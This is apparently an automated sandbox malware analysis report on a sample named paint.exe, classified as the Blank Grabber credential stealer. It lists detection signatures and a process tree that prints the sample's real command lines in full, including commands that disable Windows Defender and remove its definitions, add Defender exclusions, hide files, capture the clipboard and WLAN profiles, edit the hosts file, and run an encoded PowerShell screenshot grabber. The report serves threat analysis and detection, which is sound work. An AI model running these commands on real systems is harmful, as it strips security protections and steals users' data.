Edit tour

Windows Analysis Report
paint.exe

Overview

General Information

Sample name:	paint.exe
Analysis ID:	1584382
MD5:	14f0421574fd16a0a6a7ac20fe22482b
SHA1:	64974f8d78d54c43775ab2a67e4341442bfeb01a
SHA256:	ee5707904b7372b5389df014be575f574497907db3cad4ba45d52adc8f12e0a3
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Self deletion via cmd or bat file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Ping/Del Command Combination

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (STR)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

paint.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\paint.exe" MD5: 14F0421574FD16A0A6A7AC20FE22482B)

paint.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\paint.exe" MD5: 14F0421574FD16A0A6A7AC20FE22482B)

cmd.exe (PID: 4588 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3584 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1780 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 8036 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 3852 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 6492 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 1900 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 1312 cmdline: attrib +h +s "C:\Users\user\Desktop\paint.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 6120 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7200 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7584 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7620 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6812 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7736 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5284 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8144 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 1312 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8092 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 7832 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8100 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 6476 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8364 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8508 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8696 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 8516 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8648 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8656 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8744 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 8772 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 8832 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 8844 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8896 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8920 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8976 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 9012 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 9064 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 9076 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 9132 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

